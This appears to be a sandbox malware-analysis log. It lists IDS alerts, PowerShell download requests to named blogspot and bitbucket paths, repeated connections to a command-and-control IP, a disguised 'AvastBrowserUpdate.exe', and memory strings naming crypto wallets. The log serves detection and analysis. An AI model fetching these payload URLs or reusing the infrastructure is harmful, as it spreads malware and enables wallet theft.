                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49809 -> 23.192.229.107:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49850 -> 23.192.229.107:443
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.11.30:49849
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.11.30:49834
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49808 -> 104.192.142.25:443
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49806 -> 74.125.138.132:443
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49807 -> 74.125.138.132:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49807 -> 74.125.138.132:443
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49821 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49822 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49822 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49817 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49817 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49838 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49842 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49842 -> 64.233.185.132:443
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:49815 -> 64.233.185.132:443
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9863A9 HttpQueryInfoW,InternetReadFile,InternetQueryDataAvailable,52_2_6B9863A9
                      Source: global trafficHTTP traffic detected: GET /lundchikha.doc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: marchlkalanew6.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: marchlkalanew6.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/ansidjaassdasmjkkkkk/Ed7Axy/674fe1eb1b772d5a8f6b913ad0a40c3c7a1d2410/files/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /chig.doc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kalacpamarchclean.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kalacpamarchclean.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /chig.doc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kalacpamarchclean.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kalacpamarchclean.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /chig.doc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kalacpamarchclean.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kalacpamarchclean.blogspot.com
                      Source: global trafficDNS traffic detected: DNS query: api.msn.com
                      Source: global trafficDNS traffic detected: DNS query: marchlkalanew6.blogspot.com
                      Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                      Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                      Source: global trafficDNS traffic detected: DNS query: kalacpamarchclean.blogspot.com
                      Source: global trafficDNS traffic detected: DNS query: time.cloudflare.com
                      Source: global trafficDNS traffic detected: DNS query: ts1.aco.net
                      Source: global trafficDNS traffic detected: DNS query: ntp.time.nl
                      Source: global trafficDNS traffic detected: DNS query: x.ns.gin.ntt.net
                      Source: global trafficDNS traffic detected: DNS query: ntp.nict.jp
                      Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                      Source: global trafficDNS traffic detected: DNS query: ntp1.net.berkeley.edu
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficTCP traffic: 192.168.11.30:50583 -> 239.255.255.250:1900
                      Source: chrome.exe, 00000023.00000002.289689419024.000060C400C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/
                      Source: chrome.exe, 00000023.00000002.289689419024.000060C400C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/?
                      Source: wmlaunch.exe, 00000032.00000003.289889364016.0000023018422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/json/list?t=%u
                      Source: wmlaunch.exe, 00000032.00000003.289889364016.0000023018422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/json/list?t=%u...
                      Source: wmlaunch.exe, 00000032.00000003.289889364016.0000023018422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/json/list?t=%uws:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinit
                      Source: chrome.exe, 00000023.00000002.289677540287.000060C400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/
                      Source: chrome.exe, 00000023.00000002.289692197987.000060C400E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692487296.000060C400ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289671770639.00002C680002C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289690506994.000060C400CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289673402512.000036D00002C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289687075514.000060C4009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289691648497.000060C400DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289675377334.000060C0000ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/92db0035/42bc8076
                      Source: chrome.exe, 00000023.00000002.289690589537.000060C400CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678241077.000060C4001BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289687075514.000060C4009D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/92db0035/42bc80760(p
                      Source: chrome.exe, 00000023.00000002.289673402512.000036D00002C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/92db0035/42bc80766
                      Source: svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD562F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740415298.0000018CD560A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/92db0035/b0766183
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchrss/1.0/
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/342316794
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/345244067
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096464
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096601
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096643
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096838
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644663
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644740
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644747
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644776
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644912
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/41488637
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/41493495
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42261226
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42261756
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42261881
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42261882
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262115
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262161
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262166
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262239
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262247
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262249
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262258
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262286
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262287
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262476
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262506
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262605
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42262955
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263010
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263031
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263049
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263158
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263239
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263322
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263477
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263580
